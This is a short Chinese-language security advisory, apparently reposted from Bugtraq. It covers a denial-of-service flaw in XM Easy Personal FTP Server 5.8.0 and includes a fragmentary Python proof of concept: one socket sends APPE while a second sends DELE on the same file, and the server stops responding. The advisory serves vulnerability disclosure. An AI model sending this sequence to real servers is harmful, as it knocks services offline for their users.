受影响系统:
dxmsoft XM Easy Personal FTP Server 5.8.0
描述:
XM Easy Personal FTP Server是一款简单易用的个人FTP服务器工具。
用户登录到XM Personal FTP Server后对一个套接字连接使用APPE命令而对另一个连接使用DELE命令就会导致服务器停止响应。
第一个套接字连接:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.close()
第二个套接字连接:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("DELE "+ test_string +"\r\n")
<*来源:zhangmc (zhangmc@mail.ustc.edu.cn)
链接:http://marc.info/?l=bugtraq&m=125813427232074&w=2
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://marc.info/?l=bugtraq&m=125813427232074&w=2
建议:
厂商补丁:
dxmsoft
——-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。